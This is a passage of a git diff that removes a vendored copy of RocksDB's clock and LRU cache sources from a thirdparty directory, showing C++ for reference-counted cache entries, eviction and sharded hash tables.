-  assert(!InCache(handle->flags) && CountRefs(handle->flags) == 0);
-  context->to_delete_key.push_back(handle->key.data());
-  context->to_delete_value.emplace_back(*handle);
-  handle->key.clear();
-  handle->value = nullptr;
-  handle->deleter = nullptr;
-  recycle_.push_back(handle);
-  usage_.fetch_sub(handle->charge, std::memory_order_relaxed);
-}
-
-void ClockCacheShard::Cleanup(const CleanupContext& context) {
-  for (const CacheHandle& handle : context.to_delete_value) {
-    if (handle.deleter) {
-      (*handle.deleter)(handle.key, handle.value);
-    }
-  }
-  for (const char* key : context.to_delete_key) {
-    delete[] key;
-  }
-}
-
-bool ClockCacheShard::Ref(Cache::Handle* h) {
-  auto handle = reinterpret_cast<CacheHandle*>(h);
-  // CAS loop to increase reference count.
-  uint32_t flags = handle->flags.load(std::memory_order_relaxed);
-  while (InCache(flags)) {
-    // Use acquire semantics on success, as further operations on the cache
-    // entry has to be order after reference count is increased.
-    if (handle->flags.compare_exchange_weak(flags, flags + kOneRef,
-                                            std::memory_order_acquire,
-                                            std::memory_order_relaxed)) {
-      if (CountRefs(flags) == 0) {
-        // No reference count before the operation.
-        pinned_usage_.fetch_add(handle->charge, std::memory_order_relaxed);
-      }
-      return true;
-    }
-  }
-  return false;
-}
-
-bool ClockCacheShard::Unref(CacheHandle* handle, bool set_usage,
-                            CleanupContext* context) {
-  if (set_usage) {
-    handle->flags.fetch_or(kUsageBit, std::memory_order_relaxed);
-  }
-  // Use acquire-release semantics as previous operations on the cache entry
-  // has to be order before reference count is decreased, and potential cleanup
-  // of the entry has to be order after.
-  uint32_t flags = handle->flags.fetch_sub(kOneRef, std::memory_order_acq_rel);
-  assert(CountRefs(flags) > 0);
-  if (CountRefs(flags) == 1) {
-    // this is the last reference.
-    pinned_usage_.fetch_sub(handle->charge, std::memory_order_relaxed);
-    // Cleanup if it is the last reference.
-    if (!InCache(flags)) {
-      MutexLock l(&mutex_);
-      RecycleHandle(handle, context);
-    }
-  }
-  return context->to_delete_value.size();
-}
-
-bool ClockCacheShard::UnsetInCache(CacheHandle* handle,
-                                   CleanupContext* context) {
-  mutex_.AssertHeld();
-  // Use acquire-release semantics as previous operations on the cache entry
-  // has to be order before reference count is decreased, and potential cleanup
-  // of the entry has to be order after.
-  uint32_t flags =
-      handle->flags.fetch_and(~kInCacheBit, std::memory_order_acq_rel);
-  // Cleanup if it is the last reference.
-  if (InCache(flags) && CountRefs(flags) == 0) {
-    RecycleHandle(handle, context);
-  }
-  return context->to_delete_value.size();
-}
-
-bool ClockCacheShard::TryEvict(CacheHandle* handle, CleanupContext* context) {
-  mutex_.AssertHeld();
-  uint32_t flags = kInCacheBit;
-  if (handle->flags.compare_exchange_strong(flags, 0, std::memory_order_acquire,
-                                            std::memory_order_relaxed)) {
-    bool erased __attribute__((__unused__)) =
-        table_.erase(CacheKey(handle->key, handle->hash));
-    assert(erased);
-    RecycleHandle(handle, context);
-    return true;
-  }
-  handle->flags.fetch_and(~kUsageBit, std::memory_order_relaxed);
-  return false;
-}
-
-bool ClockCacheShard::EvictFromCache(size_t charge, CleanupContext* context) {
-  size_t usage = usage_.load(std::memory_order_relaxed);
-  size_t capacity = capacity_.load(std::memory_order_relaxed);
-  if (usage == 0) {
-    return charge <= capacity;
-  }
-  size_t new_head = head_;
-  bool second_iteration = false;
-  while (usage + charge > capacity) {
-    assert(new_head < list_.size());
-    if (TryEvict(&list_[new_head], context)) {
-      usage = usage_.load(std::memory_order_relaxed);
-    }
-    new_head = (new_head + 1 >= list_.size()) ? 0 : new_head + 1;
-    if (new_head == head_) {
-      if (second_iteration) {
-        return false;
-      } else {
-        second_iteration = true;
-      }
-    }
-  }
-  head_ = new_head;
-  return true;
-}
-
-void ClockCacheShard::SetCapacity(size_t capacity) {
-  CleanupContext context;
-  {
-    MutexLock l(&mutex_);
-    capacity_.store(capacity, std::memory_order_relaxed);
-    EvictFromCache(0, &context);
-  }
-  Cleanup(context);
-}
-
-void ClockCacheShard::SetStrictCapacityLimit(bool strict_capacity_limit) {
-  strict_capacity_limit_.store(strict_capacity_limit,
-                               std::memory_order_relaxed);
-}
-
-CacheHandle* ClockCacheShard::Insert(
-    const Slice& key, uint32_t hash, void* value, size_t charge,
-    void (*deleter)(const Slice& key, void* value), bool hold_reference,
-    CleanupContext* context) {
-  MutexLock l(&mutex_);
-  bool success = EvictFromCache(charge, context);
-  bool strict = strict_capacity_limit_.load(std::memory_order_relaxed);
-  if (!success && (strict || !hold_reference)) {
-    context->to_delete_key.push_back(key.data());
-    if (!hold_reference) {
-      context->to_delete_value.emplace_back(key, value, deleter);
-    }
-    return nullptr;
-  }
-  // Grab available handle from recycle bin. If recycle bin is empty, create
-  // and append new handle to end of circular list.
-  CacheHandle* handle = nullptr;
-  if (!recycle_.empty()) {
-    handle = recycle_.back();
-    recycle_.pop_back();
-  } else {
-    list_.emplace_back();
-    handle = &list_.back();
-  }
-  // Fill handle.
-  handle->key = key;
-  handle->hash = hash;
-  handle->value = value;
-  handle->charge = charge;
-  handle->deleter = deleter;
-  uint32_t flags = hold_reference ? kInCacheBit + kOneRef : kInCacheBit;
-  handle->flags.store(flags, std::memory_order_relaxed);
-  HashTable::accessor accessor;
-  if (table_.find(accessor, CacheKey(key, hash))) {
-    CacheHandle* existing_handle = accessor->second;
-    table_.erase(accessor);
-    UnsetInCache(existing_handle, context);
-  }
-  table_.insert(HashTable::value_type(CacheKey(key, hash), handle));
-  if (hold_reference) {
-    pinned_usage_.fetch_add(charge, std::memory_order_relaxed);
-  }
-  usage_.fetch_add(charge, std::memory_order_relaxed);
-  return handle;
-}
-
-Status ClockCacheShard::Insert(const Slice& key, uint32_t hash, void* value,
-                               size_t charge,
-                               void (*deleter)(const Slice& key, void* value),
-                               Cache::Handle** out_handle,
-                               Cache::Priority priority) {
-  CleanupContext context;
-  HashTable::accessor accessor;
-  char* key_data = new char[key.size()];
-  memcpy(key_data, key.data(), key.size());
-  Slice key_copy(key_data, key.size());
-  CacheHandle* handle = Insert(key_copy, hash, value, charge, deleter,
-                               out_handle != nullptr, &context);
-  Status s;
-  if (out_handle != nullptr) {
-    if (handle == nullptr) {
-      s = Status::Incomplete("Insert failed due to LRU cache being full.");
-    } else {
-      *out_handle = reinterpret_cast<Cache::Handle*>(handle);
-    }
-  }
-  Cleanup(context);
-  return s;
-}
-
-Cache::Handle* ClockCacheShard::Lookup(const Slice& key, uint32_t hash) {
-  HashTable::const_accessor accessor;
-  if (!table_.find(accessor, CacheKey(key, hash))) {
-    return nullptr;
-  }
-  CacheHandle* handle = accessor->second;
-  accessor.release();
-  // Ref() could fail if another thread sneak in and evict/erase the cache
-  // entry before we are able to hold reference.
-  if (!Ref(reinterpret_cast<Cache::Handle*>(handle))) {
-    return nullptr;
-  }
-  // Double check the key since the handle may now representing another key
-  // if other threads sneak in, evict/erase the entry and re-used the handle
-  // for another cache entry.
-  if (hash != handle->hash || key != handle->key) {
-    CleanupContext context;
-    Unref(handle, false, &context);
-    // It is possible Unref() delete the entry, so we need to cleanup.
-    Cleanup(context);
-    return nullptr;
-  }
-  return reinterpret_cast<Cache::Handle*>(handle);
-}
-
-bool ClockCacheShard::Release(Cache::Handle* h, bool force_erase) {
-  CleanupContext context;
-  CacheHandle* handle = reinterpret_cast<CacheHandle*>(h);
-  bool erased = Unref(handle, true, &context);
-  if (force_erase && !erased) {
-    erased = EraseAndConfirm(handle->key, handle->hash, &context);
-  }
-  Cleanup(context);
-  return erased;
-}
-
-void ClockCacheShard::Erase(const Slice& key, uint32_t hash) {
-  CleanupContext context;
-  EraseAndConfirm(key, hash, &context);
-  Cleanup(context);
-}
-
-bool ClockCacheShard::EraseAndConfirm(const Slice& key, uint32_t hash,
-                                      CleanupContext* context) {
-  MutexLock l(&mutex_);
-  HashTable::accessor accessor;
-  bool erased = false;
-  if (table_.find(accessor, CacheKey(key, hash))) {
-    CacheHandle* handle = accessor->second;
-    table_.erase(accessor);
-    erased = UnsetInCache(handle, context);
-  }
-  return erased;
-}
-
-void ClockCacheShard::EraseUnRefEntries() {
-  CleanupContext context;
-  {
-    MutexLock l(&mutex_);
-    table_.clear();
-    for (auto& handle : list_) {
-      UnsetInCache(&handle, &context);
-    }
-  }
-  Cleanup(context);
-}
-
-class ClockCache : public ShardedCache {
- public:
-  ClockCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit)
-      : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) {
-    int num_shards = 1 << num_shard_bits;
-    shards_ = new ClockCacheShard[num_shards];
-    SetCapacity(capacity);
-    SetStrictCapacityLimit(strict_capacity_limit);
-  }
-
-  virtual ~ClockCache() { delete[] shards_; }
-
-  virtual const char* Name() const override { return "ClockCache"; }
-
-  virtual CacheShard* GetShard(int shard) override {
-    return reinterpret_cast<CacheShard*>(&shards_[shard]);
-  }
-
-  virtual const CacheShard* GetShard(int shard) const override {
-    return reinterpret_cast<CacheShard*>(&shards_[shard]);
-  }
-
-  virtual void* Value(Handle* handle) override {
-    return reinterpret_cast<const CacheHandle*>(handle)->value;
-  }
-
-  virtual size_t GetCharge(Handle* handle) const override {
-    return reinterpret_cast<const CacheHandle*>(handle)->charge;
-  }
-
-  virtual uint32_t GetHash(Handle* handle) const override {
-    return reinterpret_cast<const CacheHandle*>(handle)->hash;
-  }
-
-  virtual void DisownData() override { shards_ = nullptr; }
-
- private:
-  ClockCacheShard* shards_;
-};
-
-}  // end anonymous namespace
-
-std::shared_ptr<Cache> NewClockCache(size_t capacity, int num_shard_bits,
-                                     bool strict_capacity_limit) {
-  if (num_shard_bits < 0) {
-    num_shard_bits = GetDefaultCacheShardBits(capacity);
-  }
-  return std::make_shared<ClockCache>(capacity, num_shard_bits,
-                                      strict_capacity_limit);
-}
-
-}  // namespace rocksdb
-
-#endif  // SUPPORT_CLOCK_CACHE
diff --git a/thirdparty/rocksdb/cache/clock_cache.h b/thirdparty/rocksdb/cache/clock_cache.h
deleted file mode 100644
index 1614c0e..0000000
--- a/thirdparty/rocksdb/cache/clock_cache.h
+++ /dev/null
@@ -1,16 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include "rocksdb/cache.h"
-
-#if defined(TBB) && !defined(ROCKSDB_LITE)
-#define SUPPORT_CLOCK_CACHE
-#endif
diff --git a/thirdparty/rocksdb/cache/lru_cache.cc b/thirdparty/rocksdb/cache/lru_cache.cc
deleted file mode 100644
index d29e709..0000000
--- a/thirdparty/rocksdb/cache/lru_cache.cc
+++ /dev/null
@@ -1,530 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "cache/lru_cache.h"
-
-#include <assert.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <string>
-
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-LRUHandleTable::LRUHandleTable() : list_(nullptr), length_(0), elems_(0) {
-  Resize();
-}
-
-LRUHandleTable::~LRUHandleTable() {
-  ApplyToAllCacheEntries([](LRUHandle* h) {
-    if (h->refs == 1) {
-      h->Free();
-    }
-  });
-  delete[] list_;
-}
-
-LRUHandle* LRUHandleTable::Lookup(const Slice& key, uint32_t hash) {
-  return *FindPointer(key, hash);
-}
-
-LRUHandle* LRUHandleTable::Insert(LRUHandle* h) {
-  LRUHandle** ptr = FindPointer(h->key(), h->hash);
-  LRUHandle* old = *ptr;
-  h->next_hash = (old == nullptr ? nullptr : old->next_hash);
-  *ptr = h;
-  if (old == nullptr) {
-    ++elems_;
-    if (elems_ > length_) {
-      // Since each cache entry is fairly large, we aim for a small
-      // average linked list length (<= 1).
-      Resize();
-    }
-  }
-  return old;
-}
-
-LRUHandle* LRUHandleTable::Remove(const Slice& key, uint32_t hash) {
-  LRUHandle** ptr = FindPointer(key, hash);
-  LRUHandle* result = *ptr;
-  if (result != nullptr) {
-    *ptr = result->next_hash;
-    --elems_;
-  }
-  return result;
-}
-
-LRUHandle** LRUHandleTable::FindPointer(const Slice& key, uint32_t hash) {
-  LRUHandle** ptr = &list_[hash & (length_ - 1)];
-  while (*ptr != nullptr && ((*ptr)->hash != hash || key != (*ptr)->key())) {
-    ptr = &(*ptr)->next_hash;
-  }
-  return ptr;
-}
-
-void LRUHandleTable::Resize() {
-  uint32_t new_length = 16;
-  while (new_length < elems_ * 1.5) {
-    new_length *= 2;
-  }
-  LRUHandle** new_list = new LRUHandle*[new_length];
-  memset(new_list, 0, sizeof(new_list[0]) * new_length);
-  uint32_t count = 0;
-  for (uint32_t i = 0; i < length_; i++) {
-    LRUHandle* h = list_[i];
-    while (h != nullptr) {
-      LRUHandle* next = h->next_hash;
-      uint32_t hash = h->hash;
-      LRUHandle** ptr = &new_list[hash & (new_length - 1)];
-      h->next_hash = *ptr;
-      *ptr = h;
-      h = next;
-      count++;
-    }
-  }
-  assert(elems_ == count);
-  delete[] list_;
-  list_ = new_list;
-  length_ = new_length;
-}
-
-LRUCacheShard::LRUCacheShard()
-    : high_pri_pool_usage_(0), usage_(0), lru_usage_(0) {
-  // Make empty circular linked list
-  lru_.next = &lru_;
-  lru_.prev = &lru_;
-  lru_low_pri_ = &lru_;
-}
-
-LRUCacheShard::~LRUCacheShard() {}
-
-bool LRUCacheShard::Unref(LRUHandle* e) {
-  assert(e->refs > 0);
-  e->refs--;
-  return e->refs == 0;
-}
-
-// Call deleter and free
-
-void LRUCacheShard::EraseUnRefEntries() {
-  autovector<LRUHandle*> last_reference_list;
-  {
-    MutexLock l(&mutex_);
-    while (lru_.next != &lru_) {
-      LRUHandle* old = lru_.next;
-      assert(old->InCache());
-      assert(old->refs ==
-             1);  // LRU list contains elements which may be evicted
-      LRU_Remove(old);
-      table_.Remove(old->key(), old->hash);
-      old->SetInCache(false);
-      Unref(old);
-      usage_ -= old->charge;
-      last_reference_list.push_back(old);
-    }
-  }
-
-  for (auto entry : last_reference_list) {
-    entry->Free();
-  }
-}
-
-void LRUCacheShard::ApplyToAllCacheEntries(void (*callback)(void*, size_t),
-                                           bool thread_safe) {
-  if (thread_safe) {
-    mutex_.Lock();
-  }
-  table_.ApplyToAllCacheEntries(
-      [callback](LRUHandle* h) { callback(h->value, h->charge); });
-  if (thread_safe) {
-    mutex_.Unlock();
-  }
-}
-
-void LRUCacheShard::TEST_GetLRUList(LRUHandle** lru, LRUHandle** lru_low_pri) {
-  *lru = &lru_;
-  *lru_low_pri = lru_low_pri_;
-}
-
-size_t LRUCacheShard::TEST_GetLRUSize() {
-  LRUHandle* lru_handle = lru_.next;
-  size_t lru_size = 0;
-  while (lru_handle != &lru_) {
-    lru_size++;
-    lru_handle = lru_handle->next;
-  }
-  return lru_size;
-}
-
-void LRUCacheShard::LRU_Remove(LRUHandle* e) {
-  assert(e->next != nullptr);
-  assert(e->prev != nullptr);
-  if (lru_low_pri_ == e) {
-    lru_low_pri_ = e->prev;
-  }
-  e->next->prev = e->prev;
-  e->prev->next = e->next;
-  e->prev = e->next = nullptr;
-  lru_usage_ -= e->charge;
-  if (e->InHighPriPool()) {
-    assert(high_pri_pool_usage_ >= e->charge);
-    high_pri_pool_usage_ -= e->charge;
-  }
-}
-
-void LRUCacheShard::LRU_Insert(LRUHandle* e) {
-  assert(e->next == nullptr);
-  assert(e->prev == nullptr);
-  if (high_pri_pool_ratio_ > 0 && e->IsHighPri()) {
-    // Inset "e" to head of LRU list.
-    e->next = &lru_;
-    e->prev = lru_.prev;
-    e->prev->next = e;
-    e->next->prev = e;
-    e->SetInHighPriPool(true);
-    high_pri_pool_usage_ += e->charge;
-    MaintainPoolSize();
-  } else {
-    // Insert "e" to the head of low-pri pool. Note that when
-    // high_pri_pool_ratio is 0, head of low-pri pool is also head of LRU list.
-    e->next = lru_low_pri_->next;
-    e->prev = lru_low_pri_;
-    e->prev->next = e;
-    e->next->prev = e;
-    e->SetInHighPriPool(false);
-    lru_low_pri_ = e;
-  }
-  lru_usage_ += e->charge;
-}
-
-void LRUCacheShard::MaintainPoolSize() {
-  while (high_pri_pool_usage_ > high_pri_pool_capacity_) {
-    // Overflow last entry in high-pri pool to low-pri pool.
-    lru_low_pri_ = lru_low_pri_->next;
-    assert(lru_low_pri_ != &lru_);
-    lru_low_pri_->SetInHighPriPool(false);
-    high_pri_pool_usage_ -= lru_low_pri_->charge;
-  }
-}
-
-void LRUCacheShard::EvictFromLRU(size_t charge,
-                                 autovector<LRUHandle*>* deleted) {
-  while (usage_ + charge > capacity_ && lru_.next != &lru_) {
-    LRUHandle* old = lru_.next;
-    assert(old->InCache());
-    assert(old->refs == 1);  // LRU list contains elements which may be evicted
-    LRU_Remove(old);
-    table_.Remove(old->key(), old->hash);
-    old->SetInCache(false);
-    Unref(old);
-    usage_ -= old->charge;
-    deleted->push_back(old);
-  }
-}
-
-void* LRUCacheShard::operator new(size_t size) {
-  return port::cacheline_aligned_alloc(size);
-}
-
-void* LRUCacheShard::operator new[](size_t size) {
-  return port::cacheline_aligned_alloc(size);
-}
-
-void LRUCacheShard::operator delete(void *memblock) {
-  port::cacheline_aligned_free(memblock);
-}
-
-void LRUCacheShard::operator delete[](void* memblock) {
-  port::cacheline_aligned_free(memblock);
-}
-
-void LRUCacheShard::SetCapacity(size_t capacity) {
-  autovector<LRUHandle*> last_reference_list;
-  {
-    MutexLock l(&mutex_);
-    capacity_ = capacity;
-    high_pri_pool_capacity_ = capacity_ * high_pri_pool_ratio_;
-    EvictFromLRU(0, &last_reference_list);
-  }
-  // we free the entries here outside of mutex for
-  // performance reasons
-  for (auto entry : last_reference_list) {
-    entry->Free();
-  }
-}
-
-void LRUCacheShard::SetStrictCapacityLimit(bool strict_capacity_limit) {
-  MutexLock l(&mutex_);
-  strict_capacity_limit_ = strict_capacity_limit;
-}
-
-Cache::Handle* LRUCacheShard::Lookup(const Slice& key, uint32_t hash) {
-  MutexLock l(&mutex_);
-  LRUHandle* e = table_.Lookup(key, hash);
-  if (e != nullptr) {
-    assert(e->InCache());
-    if (e->refs == 1) {
-      LRU_Remove(e);
-    }
-    e->refs++;
-  }
-  return reinterpret_cast<Cache::Handle*>(e);
-}
-
-bool LRUCacheShard::Ref(Cache::Handle* h) {
-  LRUHandle* handle = reinterpret_cast<LRUHandle*>(h);
-  MutexLock l(&mutex_);
-  if (handle->InCache() && handle->refs == 1) {
-    LRU_Remove(handle);
-  }
-  handle->refs++;
-  return true;
-}
-
-void LRUCacheShard::SetHighPriorityPoolRatio(double high_pri_pool_ratio) {
-  MutexLock l(&mutex_);
-  high_pri_pool_ratio_ = high_pri_pool_ratio;
-  high_pri_pool_capacity_ = capacity_ * high_pri_pool_ratio_;
-  MaintainPoolSize();
-}
-
-bool LRUCacheShard::Release(Cache::Handle* handle, bool force_erase) {
-  if (handle == nullptr) {
-    return false;
-  }
-  LRUHandle* e = reinterpret_cast<LRUHandle*>(handle);
-  bool last_reference = false;
-  {
-    MutexLock l(&mutex_);
-    last_reference = Unref(e);
-    if (last_reference) {
-      usage_ -= e->charge;
-    }
-    if (e->refs == 1 && e->InCache()) {
-      // The item is still in cache, and nobody else holds a reference to it
-      if (usage_ > capacity_ || force_erase) {
-        // the cache is full
-        // The LRU list must be empty since the cache is full
-        assert(!(usage_ > capacity_) || lru_.next == &lru_);
-        // take this opportunity and remove the item
-        table_.Remove(e->key(), e->hash);
-        e->SetInCache(false);
-        Unref(e);
-        usage_ -= e->charge;
-        last_reference = true;
-      } else {
-        // put the item on the list to be potentially freed
-        LRU_Insert(e);
-      }
-    }
-  }
-
-  // free outside of mutex
-  if (last_reference) {
-    e->Free();
-  }
-  return last_reference;
-}
-
-Status LRUCacheShard::Insert(const Slice& key, uint32_t hash, void* value,
-                             size_t charge,
-                             void (*deleter)(const Slice& key, void* value),
-                             Cache::Handle** handle, Cache::Priority priority) {
-  // Allocate the memory here outside of the mutex
-  // If the cache is full, we'll have to release it
-  // It shouldn't happen very often though.
-  LRUHandle* e = reinterpret_cast<LRUHandle*>(
-      new char[sizeof(LRUHandle) - 1 + key.size()]);
-  Status s;
-  autovector<LRUHandle*> last_reference_list;
-
-  e->value = value;
-  e->deleter = deleter;
-  e->charge = charge;
-  e->key_length = key.size();
-  e->hash = hash;
-  e->refs = (handle == nullptr
-                 ? 1
-                 : 2);  // One from LRUCache, one for the returned handle
-  e->next = e->prev = nullptr;
-  e->SetInCache(true);
-  e->SetPriority(priority);
-  memcpy(e->key_data, key.data(), key.size());
-
-  {
-    MutexLock l(&mutex_);
-
-    // Free the space following strict LRU policy until enough space
-    // is freed or the lru list is empty
-    EvictFromLRU(charge, &last_reference_list);
-
-    if (usage_ - lru_usage_ + charge > capacity_ &&
-        (strict_capacity_limit_ || handle == nullptr)) {
-      if (handle == nullptr) {
-        // Don't insert the entry but still return ok, as if the entry inserted
-        // into cache and get evicted immediately.
-        last_reference_list.push_back(e);
-      } else {
-        delete[] reinterpret_cast<char*>(e);
-        *handle = nullptr;
-        s = Status::Incomplete("Insert failed due to LRU cache being full.");
-      }
-    } else {
-      // insert into the cache
-      // note that the cache might get larger than its capacity if not enough
-      // space was freed
-      LRUHandle* old = table_.Insert(e);
-      usage_ += e->charge;
-      if (old != nullptr) {
-        old->SetInCache(false);
-        if (Unref(old)) {
-          usage_ -= old->charge;
-          // old is on LRU because it's in cache and its reference count
-          // was just 1 (Unref returned 0)
-          LRU_Remove(old);
-          last_reference_list.push_back(old);
-        }
-      }
-      if (handle == nullptr) {
-        LRU_Insert(e);
-      } else {
-        *handle = reinterpret_cast<Cache::Handle*>(e);
-      }
-      s = Status::OK();
-    }
-  }
-
-  // we free the entries here outside of mutex for
-  // performance reasons
-  for (auto entry : last_reference_list) {
-    entry->Free();
-  }
-
-  return s;
-}
-
-void LRUCacheShard::Erase(const Slice& key, uint32_t hash) {
-  LRUHandle* e;
-  bool last_reference = false;
-  {
-    MutexLock l(&mutex_);
-    e = table_.Remove(key, hash);
-    if (e != nullptr) {
-      last_reference = Unref(e);
-      if (last_reference) {
-        usage_ -= e->charge;
-      }
-      if (last_reference && e->InCache()) {
-        LRU_Remove(e);
-      }
-      e->SetInCache(false);
-    }
-  }
-
-  // mutex not held here
-  // last_reference will only be true if e != nullptr
-  if (last_reference) {
-    e->Free();
-  }
-}
-
-size_t LRUCacheShard::GetUsage() const {
-  MutexLock l(&mutex_);
-  return usage_;
-}
-
-size_t LRUCacheShard::GetPinnedUsage() const {
-  MutexLock l(&mutex_);
-  assert(usage_ >= lru_usage_);
-  return usage_ - lru_usage_;
-}
-
-std::string LRUCacheShard::GetPrintableOptions() const {
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-  {
-    MutexLock l(&mutex_);
-    snprintf(buffer, kBufferSize, "    high_pri_pool_ratio: %.3lf\n",
-             high_pri_pool_ratio_);
-  }
-  return std::string(buffer);
-}
-
-LRUCache::LRUCache(size_t capacity, int num_shard_bits,
-                   bool strict_capacity_limit, double high_pri_pool_ratio)
-    : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) {
-  num_shards_ = 1 << num_shard_bits;
-  shards_ = new LRUCacheShard[num_shards_];
-  SetCapacity(capacity);
-  SetStrictCapacityLimit(strict_capacity_limit);
-  for (int i = 0; i < num_shards_; i++) {
-    shards_[i].SetHighPriorityPoolRatio(high_pri_pool_ratio);
-  }
-}
-
-LRUCache::~LRUCache() { delete[] shards_; }
-
-CacheShard* LRUCache::GetShard(int shard) {
-  return reinterpret_cast<CacheShard*>(&shards_[shard]);
-}
-
-const CacheShard* LRUCache::GetShard(int shard) const {
-  return reinterpret_cast<CacheShard*>(&shards_[shard]);
-}
-
-void* LRUCache::Value(Handle* handle) {
-  return reinterpret_cast<const LRUHandle*>(handle)->value;
-}
-
-size_t LRUCache::GetCharge(Handle* handle) const {
-  return reinterpret_cast<const LRUHandle*>(handle)->charge;
-}
-
-uint32_t LRUCache::GetHash(Handle* handle) const {
-  return reinterpret_cast<const LRUHandle*>(handle)->hash;
-}
-
-void LRUCache::DisownData() {
-// Do not drop data if compile with ASAN to suppress leak warning.
-#ifndef __SANITIZE_ADDRESS__
-  shards_ = nullptr;
-#endif  // !__SANITIZE_ADDRESS__
-}
-
-size_t LRUCache::TEST_GetLRUSize() {
-  size_t lru_size_of_all_shards = 0;
-  for (int i = 0; i < num_shards_; i++) {
-    lru_size_of_all_shards += shards_[i].TEST_GetLRUSize();
-  }
-  return lru_size_of_all_shards;
-}
-
-std::shared_ptr<Cache> NewLRUCache(size_t capacity, int num_shard_bits,
-                                   bool strict_capacity_limit,
-                                   double high_pri_pool_ratio) {
-  if (num_shard_bits >= 20) {
-    return nullptr;  // the cache cannot be sharded into too many fine pieces
-  }
-  if (high_pri_pool_ratio < 0.0 || high_pri_pool_ratio > 1.0) {
-    // invalid high_pri_pool_ratio
-    return nullptr;
-  }
-  if (num_shard_bits < 0) {
-    num_shard_bits = GetDefaultCacheShardBits(capacity);
-  }
-  return std::make_shared<LRUCache>(capacity, num_shard_bits,
-                                    strict_capacity_limit, high_pri_pool_ratio);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/cache/lru_cache.h b/thirdparty/rocksdb/cache/lru_cache.h
deleted file mode 100644
index abe78fd..0000000
--- a/thirdparty/rocksdb/cache/lru_cache.h
+++ /dev/null
@@ -1,302 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <string>
-
-#include "cache/sharded_cache.h"
-
-#include "port/port.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-// LRU cache implementation
-
-// An entry is a variable length heap-allocated structure.
-// Entries are referenced by cache and/or by any external entity.
-// The cache keeps all its entries in table. Some elements
-// are also stored on LRU list.
-//
-// LRUHandle can be in these states:
-// 1. Referenced externally AND in hash table.
-//  In that case the entry is *not* in the LRU. (refs > 1 && in_cache == true)
-// 2. Not referenced externally and in hash table. In that case the entry is
-// in the LRU and can be freed. (refs == 1 && in_cache == true)
-// 3. Referenced externally and not in hash table. In that case the entry is
-// in not on LRU and not in table. (refs >= 1 && in_cache == false)
-//
-// All newly created LRUHandles are in state 1. If you call
-// LRUCacheShard::Release
-// on entry in state 1, it will go into state 2. To move from state 1 to
-// state 3, either call LRUCacheShard::Erase or LRUCacheShard::Insert with the
-// same key.
-// To move from state 2 to state 1, use LRUCacheShard::Lookup.
-// Before destruction, make sure that no handles are in state 1. This means
-// that any successful LRUCacheShard::Lookup/LRUCacheShard::Insert have a
-// matching
-// RUCache::Release (to move into state 2) or LRUCacheShard::Erase (for state 3)
-
-struct LRUHandle {
-  void* value;
-  void (*deleter)(const Slice&, void* value);
-  LRUHandle* next_hash;
-  LRUHandle* next;
-  LRUHandle* prev;
-  size_t charge;  // TODO(opt): Only allow uint32_t?
-  size_t key_length;
-  uint32_t refs;     // a number of refs to this entry
-                     // cache itself is counted as 1
-
-  // Include the following flags:
-  //   in_cache:    whether this entry is referenced by the hash table.
-  //   is_high_pri: whether this entry is high priority entry.
-  //   in_high_pro_pool: whether this entry is in high-pri pool.
-  char flags;
-
-  uint32_t hash;     // Hash of key(); used for fast sharding and comparisons
-
-  char key_data[1];  // Beginning of key
-
-  Slice key() const {
-    // For cheaper lookups, we allow a temporary Handle object
-    // to store a pointer to a key in "value".
-    if (next == this) {
-      return *(reinterpret_cast<Slice*>(value));
-    } else {
-      return Slice(key_data, key_length);
-    }
-  }
-
-  bool InCache() { return flags & 1; }
-  bool IsHighPri() { return flags & 2; }
-  bool InHighPriPool() { return flags & 4; }
-
-  void SetInCache(bool in_cache) {
-    if (in_cache) {
-      flags |= 1;
-    } else {
-      flags &= ~1;
-    }
-  }
-
-  void SetPriority(Cache::Priority priority) {
-    if (priority == Cache::Priority::HIGH) {
-      flags |= 2;
-    } else {
-      flags &= ~2;
-    }
-  }
-
-  void SetInHighPriPool(bool in_high_pri_pool) {
-    if (in_high_pri_pool) {
-      flags |= 4;
-    } else {
-      flags &= ~4;
-    }
-  }
-
-  void Free() {
-    assert((refs == 1 && InCache()) || (refs == 0 && !InCache()));
-    if (deleter) {
-      (*deleter)(key(), value);
-    }
-    delete[] reinterpret_cast<char*>(this);
-  }
-};
-
-// We provide our own simple hash table since it removes a whole bunch
-// of porting hacks and is also faster than some of the built-in hash
-// table implementations in some of the compiler/runtime combinations
-// we have tested.  E.g., readrandom speeds up by ~5% over the g++
-// 4.4.3's builtin hashtable.
-class LRUHandleTable {
- public:
-  LRUHandleTable();
-  ~LRUHandleTable();
-
-  LRUHandle* Lookup(const Slice& key, uint32_t hash);
-  LRUHandle* Insert(LRUHandle* h);
-  LRUHandle* Remove(const Slice& key, uint32_t hash);
-
-  template <typename T>
-  void ApplyToAllCacheEntries(T func) {
-    for (uint32_t i = 0; i < length_; i++) {
